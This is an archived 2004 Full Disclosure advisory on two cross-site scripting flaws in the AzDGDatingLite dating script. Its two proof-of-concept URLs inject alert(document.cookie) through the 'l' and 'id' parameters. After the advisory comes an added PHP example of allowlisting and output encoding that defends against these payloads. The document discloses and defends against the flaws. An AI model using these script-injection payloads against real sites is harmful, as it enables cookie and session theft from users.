Full Disclosure mailing list archives
[waraxe-2004-SA#014 - Cross-Site Scripting aka XSS in AzDGDatingLite]
From: Janek Vind <come2waraxe () yahoo com>
Date: Thu, 8 Apr 2004 08:48:40 -0700 (PDT)
{================================================================================}
{ [waraxe-2004-SA#014] }
{================================================================================}
{ }
{ [ Cross-Site Scripting aka XSS in AzDGDatingLite ] }
{ }
{================================================================================}

Author: Janek Vind "waraxe"
Date: 07. April 2004
Location: Estonia, Tartu
Web: http://www.waraxe.us/index.php?modname=sa&id=14

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

AzDGDatingLite: Version 2.1.1 (probably older versions are affected too)
Written by: AzDG (support () azdg com)
Homepage: http://www.azdg.com

Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1. Cross-Site Scripting in language variable:

http://localhost/azdlite/index.php?l=en"><script>alert(document.cookie);</script>

2. Cross-Site Scripting in view.php:

http://localhost/azdlite/view.php?l=&id=00001<script>alert(document.cookie);</script>

Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Greets to torufoorum members and to all bugtraq readers in Estonia!
Tervitused!
Special greets to Stefano from UT Bee Clan!

Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

come2waraxe () yahoo com
Janek Vind "waraxe"

Homepage: http://www.waraxe.us/

---------------------------------- [ EOF ] ------------------------------------

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
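Added example, not part of the original advisory and not AzDGDatingLite source code: one way to handle the two parameters named above, validating `l` against an allowlist and `id` as digits only, then HTML-encoding at output. The language list, the length limit and the function names are assumptions made for illustration.

```php
<?php
// Hypothetical input handling for the `l` and `id` parameters (added example).

// Assumed set of language codes; the application's real list is not on the page.
const ALLOWED_LANGS = ['en', 'ru', 'de'];
const DEFAULT_LANG = 'en';

/** Return a language code from the allowlist, or the default. */
function clean_lang($raw): string
{
    return (is_string($raw) && in_array($raw, ALLOWED_LANGS, true)) ? $raw : DEFAULT_LANG;
}

/** Return the profile id if it is 1-10 ASCII digits (assumed limit), else null. */
function clean_id($raw): ?string
{
    return (is_string($raw) && preg_match('/\A[0-9]{1,10}\z/', $raw) === 1) ? $raw : null;
}

/** Encode a value for HTML text and quoted attribute values. */
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed inputs modelled on the two request shapes in the advisory.
$samples = [
    ['l' => 'en', 'id' => '00001'],
    ['l' => 'en"><script>alert(document.cookie);</script>', 'id' => '00001'],
    ['l' => '', 'id' => '00001<script>alert(document.cookie);</script>'],
];

foreach ($samples as $q) {
    $lang = clean_lang($q['l']);   // anything off the allowlist becomes the default
    $id = clean_id($q['id']);      // anything but digits is rejected outright
    if ($id === null) {
        echo "400 Bad Request (id rejected)\n";
        continue;
    }
    // Validated values are still encoded at the point of output.
    echo '<a href="view.php?l=' . h($lang) . '&amp;id=' . h($id) . '">profile</a>' . "\n";
}
```

The first two samples render a link with `l=en`; the third is rejected because the `id` value is not purely numeric.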